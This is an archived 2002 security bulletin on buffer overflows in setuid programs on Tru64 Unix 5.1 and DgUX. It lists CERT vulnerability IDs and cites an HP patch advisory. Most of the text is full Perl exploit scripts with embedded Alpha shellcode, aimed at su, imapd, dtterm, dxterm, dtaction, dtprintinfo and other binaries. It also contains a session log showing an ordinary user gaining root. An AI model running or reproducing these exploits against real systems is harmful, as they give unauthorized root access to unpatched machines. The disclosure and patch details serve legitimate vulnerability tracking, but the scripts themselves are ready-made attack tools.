TUCoPS :: Unix :: General
:: unix5666.htm
Tru64 Unix /bin/su exploit
3rd Sep 2002 [SBWID-5666]
COMMAND
Tru64 Unix, dgUX local and remote exploits with bypass of non-exec
stack
SYSTEMS AFFECTED
Tru64 5.1
Tru64 5.1A
DgUX 4.0
PROBLEM
Kf <dotslash@snosoft.com> writes:
Just so Compaq does not flip out and try to sue us... it has come to my
attention that someone with access to our lab has leaked one of the
exploits for TRU64. We employ people from the general public from all
over the world for our development so we have not yet pinpointed how
the code was "lifted" as many people have access to our lab. This issue
was already passed on to the public in September of 2001 and an exploit
was ALREADY published by k2 of ADM...so I don't see this as any big
surprise short of the fact that ours will bypass the non-exec
stack...just a heads up.
http://packetstorm.linuxsecurity.com/0101-exploits/tru-64.su.c>>is
the code that was released last year... This is the code that we
created to exploit /bin/su... I believe this is what was leaked.
>#!/usr/bin/perl -w
>#
># xxxxx (xxxxx@snosoft.com) - 30/05/2002
>#
>
>($offset) = @ARGV,$offset || ($offset = 0);
>$ret_addr = pack("ll",(0x40010250+$offset),0x1);
>
>$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
>$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
>$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
>$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
>$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
>$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
>$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
>$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
>$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
>$sc .= "x20x35x60x42xffxffxffxff";
>
>$buf_a = "A"x8233;
>$buf_a .= $ret_addr;
>
>$buf_b = pack("l",0x47ff041f)x3750;
>$buf_b .= $sc;
>
>exec("/usr/bin/su",$buf_a,$buf_b,0);
>
-Also-
On the non-exec stack bypassing, Ian A. Finlay of CERT (R) Coordination
Center proposed to KF the revised alert titles that get covered by
"master vul" tracking number VU#193347 :
VU#158499 - csh vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#510235 - dtsession vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#846307 - dxsysinfo vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#671627 - dxchpwd vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#836275 - dtaction vulnerable to buffer overflow via long string of characters supplied as "-contextDir" command line argument
VU#600699 - dtprintinfo vulnerable to buffer overflow via long string of characters supplied as "-p" command line argument
VU#320067 - dtterm vulnerable to heap overflow via long string of characters supplied as "-tn" command line argument
VU#931579 - dxterm vulnerable to heap overflow via long string of characters supplied as "-customization" command line argument
VU#193347 - Compaq Tru64 non-executeable stack contains buffer overflow in SIA libraries
VU#435611 - /usr/bin/at command vulnerable to buffer overflow via long string of characters supplied as command line argument
VU#202939 - dtterm vulnerable to buffer overflow via long string of characters supplied as "DISPLAY" environment variable
VU#693803 - dxpause contains buffer overflow in _XKB_CHARSET library
VU#569987 - dxconsole contains buffer overflow in _XKB_CHARSET library
VU#584243 - dtsession contains buffer overflow in _XKB_CHARSET library
VU#567963 - imapd vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#592515 - inc vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#448987 - uucp vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#437899 - uux vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#531355 - rdist vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#416427 - deliver vulnerable to buffer overflow via long string of characters supplied as $NLSPATH environment variable
VU#177067 - Compaq Tru64 "/usr/bin/passwd" vulnerable to buffer overflow via long string of characters
VU#864083 - Compaq Tru64 "/bin/chsh" vulnerable to buffer overflow via long string of characters
VU#137555 - chfn vulnerable to buffer overflow via long string of character supplied as command line argument
Update (09 September 2002)
======
In Snosoft formal disclosure titled "Strategic Reconnaissance Team
Security Advisory(SRT2002-09)" :
--snipp--
Here is a quick look at how one of these issues can be exploited. It
should be fairly self explanatory.
% uname -a
OSF1 alpha.snosoft.com V5.1 732 alpha
% id
uid=208(stripey) gid=15(users)
% ls -la /usr/sbin/imapd
-rws--x--x 1 root bin 789216 Aug 24 2000 /usr/sbin/imapd
% perl -e'$ENV{"NLSPATH"}=("A"x1024)."x01x02x03x04x05";exec("/usr/sbin/imapd")'
Segmentation fault
% su
Password:
# cp /usr/sbin/imapd test
# chmod a+r test
# exit
% perl -e'$ENV{"NLSPATH"}=("A"x1024)."x01x02x03x04x05";exec("dbx","./test")'
(dbx) r
signal Segmentation fault at
warning: PC value 0x504030200 not valid, trying RA
warning: RA value 0x504030200 not valid, trying text start
warning: text start 0x120000000 not valid, trying data start
warning: Using data start as a text address -- traceback will not work
> [., 0x140000000] call_pal cflush
(dbx) 0x140014280/2X
0x0000000140014280: 0x4141414141414141 0x4141414141414141
(dbx) q
% perl -e'$ENV{"NLSPATH"}=(pack("l",0x47ff041f)x227).(`./sc`).pack("ll",0x40014280,0x1);exec("/usr/sbin/imapd")'
# id
uid=208(stripey) gid=15(users) euid=0(root)
#
--snapp--
Update (16 september 2002)
======
Snosoft has released exploits ...
#!/usr/bin/perl -w
#
# Tru64 5.1 _XKB_CHARSET
#
# stripey (stripey@snosoft.com) - 10/07/2002
#
$tgts{"0"} = pack("l",0x40010250).":/usr/bin/X11/dxconsole:uid=root";
$tgts{"1"} = pack("l",0x40012584).":/usr/bin/X11/dxpause:uid=root";
$tgts{"2"} = pack("l",0x400101e4).":/usr/dt/bin/dtsession:euid=root";
unless (($target,$offset,$align) = @ARGV,$align) {
print "-"x72;
print "\n Tru64 _XKB_CHARSET overflow, stripey\@snosoft.com, 03/07/2002\n";
print "-"x72;
print "\n\nUsage: 0ドル <target> <offset> <align>\n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b,$c) = split(/\:/,$tgts{"$key"});
print "\t$key. $b ( $c )\n";
}
print "\n";
exit 1;
}
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$buf_a = "A"x256;
$buf_a .= $ret;
$buf_b = "B"x$align;
if ($target eq "2" ) {
$buf_b .= pack("l",0x47ff041f)x56;
} else {
$buf_b .= pack("l",0x47ff041f)x3750;
}
$buf_b .= $sc;
$ENV{"_XKB_CHARSET"} = $buf_a;
$ENV{"HOME"} = $buf_b;
exec("$b");
#!/usr/bin/perl -w
#
# Tru64 5.1 /usr/bin/su
#
# stripey (stripey@snosoft.com) - 30/05/2002
#
unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 0; }
$ret_addr = pack("ll",(0x40010250+$offset),0x1);
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$buf_a = "A"x8233;
$buf_a .= $ret_addr;
$buf_b = "B"x$align;
$buf_b .= pack("l",0x47ff041f)x3750;
$buf_b .= $sc;
exec("/usr/bin/su",$buf_a,$buf_b,0);
#!/usr/bin/perl -w
#
# Tru64 5.1 NLSPATH
#
# stripey (stripey@snosoft.com) - 03/07/2002
#
$tgts{"0"} = pack("l",0x40011a10).":/usr/tcb/bin/edauth:uid=root";
$tgts{"1"} = pack("l",0x40014280).":/usr/sbin/imapd:euid=root";
$tgts{"2"} = pack("l",0x400120b0).":/usr/bin/rdist:euid=root";
$tgts{"3"} = pack("l",0x40014a80).":/usr/bin/mh/inc:euid=root";
$tgts{"4"} = pack("l",0x40010104).":/usr/bin/mh/msgchk:euid=root";
$tgts{"5"} = pack("l",0x40010c04).":/usr/dt/bin/dtsession:euid=root";
$tgts{"6"} = pack("l",0x400a7908).":/usr/bin/X11/dxsysinfo:euid=root, requires valid \$DISPLAY";
$tgts{"7"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd:euid=root, requires valid \$DISPLAY";
$tgts{"8"} = pack("l",0x400105e8).":/usr/bin/deliver:euid=imap";
$tgts{"9"} = pack("l",0x4003c190).":/usr/bin/uucp:euid=uucp,egid=uucp";
$tgts{"A"} = pack("l",0x400361f0).":/usr/bin/uux:euid=uucp,egid=uucp";
unless (($target,$offset,$align) = @ARGV,$align) {
print "-"x72;
print "\n Tru64 NLSPATH overflow, stripey\@snosoft.com, 03/07/2002\n";
print "-"x72;
print "\n\nUsage: 0ドル <target> <offset> <align>\n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b,$c) = split(/\:/,$tgts{"$key"});
print "\t$key. $b ( $c )\n";
}
print "\n";
exit 1;
}
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$tlen = (1024-(length($sc)))/4;
$buf .= "B"x$align;
$buf .= pack("l",0x47ff041f)x($tlen-1);
$buf .= $sc;
$buf .= $ret;
$ENV{"NLSPATH"} = $buf;
if ($target eq 8) { print "Hit ctrl-d...\n"; }
if ($target eq 3) {
$buf_b = "AA";
$buf_b .= pack("l",0x47ff041f)x512;
$buf_b .= $sc;
open(OH,">.mh_profile");
print OH "Path: $buf_b\n";
close(OH);
}
if ($target eq "4") {
$buf_b = "AA";
$buf_b .= pack("l",0x47ff041f)x2000;
$buf_b .= $sc;
open(OH,">.mh_profile");
print OH "Path: $buf_b\n";
close(OH);
}
if ($target eq 2) {
exec("$b","-d","a=asdf","-c","/tmp/","\'\$\{a\}\'");
}
if ($target eq 0) {
$buf_b = "B"x30000;
exec("$b","-g","-dt",$buf_b);
}
exec("$b");
#!/usr/bin/perl -w
#
# Tru64 5.1 /usr/bin/X11/dxterm
#
# stripey (stripey@snosoft.com) - 03/07/2002
#
($offset) = @ARGV,$offset || ($offset = 0);
$ret_addr = pack("ll",(0x4001c828+$offset),0x1);
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$buf_a .= pack("l",0x47ff041f)x2048;
$buf_a .= $sc;
$buf_a .= $ret_addr;
exec("/usr/bin/X11/dxterm","-customization",$buf_a);
#!/usr/bin/perl -w
#
# Tru64 5.1 /usr/dt/bin/dtterm
#
# Shellcode modified to exec /tmp/sh instead of /bin/sh...
#
# stripey (stripey@snosoft.com) - 30/05/2002
#
unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 3; }
$ret_addr = pack("ll",(0x4001720c+$offset),0x1);
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x6d\x70\x7f\x26";
$sc .= "\x2f\x74\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42xff\xff\xff\xff";
$buf_a = "A"x8203;
$buf_a .= $ret_addr;
$buf_b = "B"x$align;
$buf_b .= pack("l",0x47ff041f)x1024;
$buf_b .= $sc;
exec("/usr/dt/bin/dtterm","-tn",$buf_a,"-e","\"$buf_b\"",0);
#!/usr/bin/perl -w
#
# Tru64 5.1 /ust/dt/bin/dtprintinfo
#
# stripey (stripey@snosoft.com) - 01/06/2002
#
unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 1; }
$ret_addr = pack("ll",(0x40033610+$offset),0x1);
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$buf_a = "A"x2048;
$buf_a .= $ret_addr;
$buf_b = "B"x$align;
$buf_b .= pack("l",0x47ff041f)x1024;
$buf_b .= $sc;
$ENV{"LANG"} = $buf_a;
exec("/usr/dt/bin/dtprintinfo","-p",$buf_b,0);
#!/usr/bin/perl -w
#
# Tru64 5.1 /usr/dt/bin/dtaction
#
# stripey (stripey@snosoft.com) - 01/06/2002
#
unless (($offset,$align) = @ARGV,$align) { $offset = 0; $align = 0; }
$ret_addr = pack("ll",(0x40016810+$offset),0x1);
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
$buf_a = "A"x2048;
$buf_a .= $ret_addr;
$buf_b = "B"x$align;
$buf_b .= pack("l",0x47ff041f)x2221;
$buf_b .= $sc;
$ENV{"LANG"} = $buf_a;
exec("/usr/dt/bin/dtaction","-contextDir",$buf_b,0);
SOLUTION
HP/Compaq has provided the following advisory and patches:
HP Advisory Ref: SSRT2257
http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11